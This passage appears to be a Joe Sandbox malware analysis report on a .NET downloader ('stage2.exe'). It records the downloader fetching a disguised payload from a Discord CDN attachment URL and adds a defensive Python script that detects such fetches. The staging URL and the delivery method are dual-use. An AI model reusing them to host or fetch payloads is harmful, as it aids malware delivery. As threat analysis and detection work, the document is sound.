    Source: Binary string: ncrypt.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: secur32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Xml.ni.pdbRSDS source: WER14DB.tmp.dmp.26.dr
    Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Core.ni.pdbRSDSD source: WER14DB.tmp.dmp.26.dr
    Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: mscoreei.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: (P}k0C:\Windows\mscorlib.pdb source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: shcore.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbW source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.ni.pdbT3Mn source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
    Source: Binary string: fltLib.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Core.ni.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
    Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: stage2.exe, 00000001.00000000.438573305.0000000001686000.00000004.00000020.sdmp
    Source: Binary string: .pdb! source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: shell32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
    Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: wimm32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: winhttp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: ntasn1.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\mscorlib.pdb6 source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: System.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: rtutils.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: fwpuclnt.pdb& id7 source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: profapi.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
    Source: Binary string: sechost.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: mscorlib.ni.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
    Source: Binary string: System.ni.pdbRSDS source: WER14DB.tmp.dmp.26.dr
    Source: Binary string: clrjit.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: bcrypt.pdbF source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: rasman.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: propsys.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: wUxTheme.pdb4Shd source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: rasadhlp.pdbh source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: winhttp.pdb\ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: version.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: Windows.StateRepositoryPS.pdb+3 source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: System.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.464485717.0000000005111000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: System.Xml.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
    Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000001A.00000003.464741257.0000000005110000.00000004.00000040.sdmp
    Source: Binary string: psapi.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: stage2.exe, 00000001.00000002.480976922.00000000016AD000.00000004.00000020.sdmp, stage2.exe, 00000001.00000000.440746191.00000000016AD000.00000004.00000020.sdmp
    Source: Binary string: gpapi.pdb2 ]dd source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: cldapi.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000001A.00000003.447382616.0000000000D85000.00000004.00000001.sdmp
    Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000001A.00000003.464365553.0000000005141000.00000004.00000001.sdmp
    Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: dhcpcsvc.pdbn source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: stage2.PDB source: stage2.exe, 00000001.00000002.480317492.00000000012F9000.00000004.00000001.sdmp, stage2.exe, 00000001.00000000.437930330.00000000012F9000.00000004.00000001.sdmp
    Source: Binary string: wuser32.pdb>Srdn source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Core.pdb source: WerFault.exe, 0000001A.00000003.464305782.000000000512A000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: combase.pdbk source: WerFault.exe, 0000001A.00000003.464082708.0000000005112000.00000004.00000040.sdmp
    Source: Binary string: rsaenh.pdb@ source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: arkjrukCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000001A.00000002.477704320.00000000006E2000.00000004.00000001.sdmp
    Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp
    Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: wuser32.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: System.Xml.ni.pdb" source: WerFault.exe, 0000001A.00000003.464559454.000000000512B000.00000004.00000001.sdmp
    Source: Binary string: System.ni.pdb source: WerFault.exe, 0000001A.00000002.479372226.0000000005340000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp, WER14DB.tmp.dmp.26.dr
    Source: Binary string: edputil.pdb source: WerFault.exe, 0000001A.00000003.464142412.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464763017.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464688604.000000000511A000.00000004.00000040.sdmp, WerFault.exe, 0000001A.00000003.464545465.000000000511A000.00000004.00000040.sdmp
    Source: Binary string: crypt32.pdb source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp
    Source: Binary string: winnsi.pdb< gd> source: WerFault.exe, 0000001A.00000003.463880358.000000000511D000.00000004.00000040.sdmp

    Networking:

    Yara detected MSILDownloaderGeneric
    Source: Yara match | File source: Process Memory Space: stage2.exe PID: 7084, type: MEMORYSTR
    Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: global traffic | HTTP traffic detected:
    GET /attachments/928503440139771947/930108637681184768/Tbopbh.jpg HTTP/1.1
    Host: cdn.discordapp.com
    Connection: Keep-Alive
    Source: Joe Sandbox View | IP Address: 162.159.130.233
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 443
    Source: global traffic | HTTP traffic detected:
    HTTP/1.1 403 Forbidden
    Date: Mon, 17 Jan 2022 01:25:24 GMT
    Content-Type: application/xml; charset=UTF-8
    Content-Length: 223
    Connection: close
    CF-Ray: 6cebca1adc534a68-FRA
    Cache-Control: private, max-age=0
    Expires: Mon, 17 Jan 2022 01:25:24 GMT
    Vary: Accept-Encoding
    CF-Cache-Status: MISS
    Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
    X-GUploader-UploadID: ADPycds5oM3NpZ9AylXZpGVOB9ntKzX9oHiZ36JltKQWVbDwXaSj4icPcReICi5s5vNaRHT4QvI_mIj3uwpfm47zzoOikFzaRA
    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RfbSACd0FpP8AarT40rUdyTU16oiVuL8ktNluhrU0TLjW%2BTGsBj6c0zZg%2FW2Tg%2BHLybyYjE0%2BAX8GvswXYherK%2BwZycY1622%2BqIiXLXq84wLdlCovP450WnSVpVht58ekJr99w%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    Source: stage2.exe, 00000001.00000000.438989759.000000000337A000.00000004.00000001.sdmp | String found in binary or memory: http://cdn.discordapp.com
    Source: stage2.exe, 00000001.00000000.438573305.0000000001686000.00000004.00000020.sdmp, powershell.exe, 00000002.00000002.339502555.0000000000FB3000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.426449347.0000000000DCD000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.475719266.0000000004B86000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.479105876.0000000004B86000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: powershell.exe, 0000000D.00000002.432860821.0000000009220000.00000004.00000001.sdmp | String found in binary or memory: http://crl.microsoft
    Source: powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000002.00000003.310415141.0000000007CBA000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png$
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
    Source: stage2.exe, 00000001.00000000.441216587.0000000003363000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.340839036.0000000004DC1000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.427485435.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
    Source: WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
    Source: Amcache.hve.26.dr | String found in binary or memory: http://upx.sf.net
    Source: powershell.exe, 00000002.00000003.310415141.0000000007CBA000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html$
    Source: stage2.exe, 00000001.00000000.441216587.0000000003363000.00000004.00000001.sdmp | String found in binary or memory: https://cdn.discordapp.com
    Source: stage2.exe | String found in binary or memory: https://cdn.discordapp.com/attachments/928503440139771947/930108637681184768/Tbopbh.jpg
    Source: stage2.exe, 00000001.00000000.441216587.0000000003363000.00000004.00000001.sdmp | String found in binary or memory: https://cdn.discordapp.com4
    Source: powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000002.00000003.310415141.0000000007CBA000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester$
    Source: powershell.exe, 00000002.00000002.341684839.0000000005150000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.429277847.0000000004FA7000.00000004.00000001.sdmp | String found in binary or memory: https://go.micro
    Source: powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
    Source: WerFault.exe, 0000001A.00000002.478119853.0000000000DAA000.00000004.00000001.sdmp | String found in binary or memory: https://watson.telemetry)
    Source: unknown | DNS traffic detected: queries for: cdn.discordapp.com
    Source: global traffic | HTTP traffic detected:
    GET /attachments/928503440139771947/930108637681184768/Tbopbh.jpg HTTP/1.1
    Host: cdn.discordapp.com
    Connection: Keep-Alive
    Source: unknown | HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49752 version: TLS 1.2
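    The Discord CDN fetch recorded above is the stage2 downloader pulling its next payload: the GET carries no User-Agent, the URL is embedded in the binary as a string, and the CDN answered 403 at analysis time, so the fetched body is not in this report. The attachment path also carries two Discord snowflake IDs, which date the channel and the upload. The following Python is an added example, not code from the report or from the sample: it scans a byte blob for the attachment URL in both ASCII and UTF-16LE (the encoding of .NET string literals), converts the snowflake IDs to timestamps, and flags attachment fetches in a constructed proxy-log sample. The log line format, the sample lines and the "ua=-" convention for a missing User-Agent are this example's assumptions.

```python
"""Added example, not part of the Joe Sandbox report: triage helpers for the
Discord CDN download recorded in the Networking section."""
import re
from datetime import datetime, timezone

DISCORD_EPOCH_MS = 1_420_070_400_000  # 2015-01-01T00:00:00Z, start of Discord's snowflake epoch

# Matches the attachment URL shape seen in the report: /attachments/<channel>/<attachment>/<name>
ATTACHMENT_RE = re.compile(
    r"https?://cdn\.discordapp\.com/attachments/"
    r"(?P<channel>\d{17,20})/(?P<attachment>\d{17,20})/(?P<name>[^\s\x00\"'?<>]+)"
)


def snowflake_to_datetime(snowflake: int) -> datetime:
    """The upper 42 bits of a Discord snowflake are milliseconds since DISCORD_EPOCH_MS,
    so the channel ID dates the infrastructure and the attachment ID dates the upload."""
    ms = (snowflake >> 22) + DISCORD_EPOCH_MS
    return datetime.fromtimestamp(ms / 1000, tz=timezone.utc)


def find_attachment_urls(data: bytes) -> list[str]:
    """Static check over raw bytes. .NET string literals live UTF-16LE in the #US heap,
    so scan both encodings (and both UTF-16 alignments) rather than an ASCII-only pass."""
    views = [data.decode("latin-1")]
    for offset in (0, 1):
        views.append(data[offset:].decode("utf-16-le", errors="ignore"))
    found = {m.group(0) for view in views for m in ATTACHMENT_RE.finditer(view)}
    return sorted(found)


# Constructed proxy-log sample (assumed format: "<utc-ts> <client> <method> <url> ua=<agent or ->").
SAMPLE_LOG = """\
2022-01-17T01:25:24Z 192.168.2.3 GET https://cdn.discordapp.com/attachments/928503440139771947/930108637681184768/Tbopbh.jpg ua=-
2022-01-17T01:26:01Z 192.168.2.3 GET https://cdn.discordapp.com/attachments/111111111111111111/222222222222222222/photo.png ua=Mozilla/5.0
2022-01-17T01:27:10Z 192.168.2.3 GET https://example.invalid/index.html ua=-
"""


def triage_log(log_text: str) -> list[dict]:
    """Flag Discord attachment fetches. A missing User-Agent (the report notes the GET
    carried none) is what separates a .NET WebClient loader from a browser or the
    Discord client, so it is recorded per hit rather than used to filter."""
    hits = []
    for line in log_text.splitlines():
        _ts, client, _method, url, ua_field = line.split(" ", 4)
        m = ATTACHMENT_RE.search(url)
        if not m:
            continue
        ua = ua_field.partition("=")[2]
        hits.append({
            "client": client,
            "url": url,
            "filename": m["name"],
            "no_user_agent": ua in ("", "-"),
            "uploaded": snowflake_to_datetime(int(m["attachment"])),
            "channel_created": snowflake_to_datetime(int(m["channel"])),
        })
    return hits


if __name__ == "__main__":
    for hit in triage_log(SAMPLE_LOG):
        print(hit["filename"], "no-UA" if hit["no_user_agent"] else "UA present",
              "uploaded", hit["uploaded"].isoformat())
```

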